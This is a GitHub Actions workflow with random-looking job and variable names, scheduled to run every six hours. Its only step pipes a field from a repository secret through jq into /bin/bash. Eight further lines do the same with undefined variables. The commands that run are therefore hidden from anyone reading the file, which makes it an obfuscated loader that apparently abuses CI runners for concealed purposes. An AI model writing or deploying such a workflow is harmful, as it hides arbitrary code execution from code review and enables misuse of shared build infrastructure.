name: tonghugjiga
on:
  workflow_dispatch:
  schedule:
    - cron: '59 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tonghugjiga
        env:
          j05753: ${{ secrets.j05753 }}
        run: |
          echo $j05753 | jq -r .geqnl8 | /bin/bash
          echo $pjgm29 | jq -r .s107 | /bin/bash
          echo $gfttc0505 | jq -r .m25996 | /bin/bash
          echo $pfxmu0299 | jq -r .brz397 | /bin/bash
          echo $ft1793 | jq -r .nuqr2 | /bin/bash
          echo $yq879 | jq -r .ouw489 | /bin/bash
          echo $we10 | jq -r .ozwlr06384 | /bin/bash
          echo $rkol797 | jq -r .vuw5 | /bin/bash
          echo $iidvx7063 | jq -r .aart994 | /bin/bash

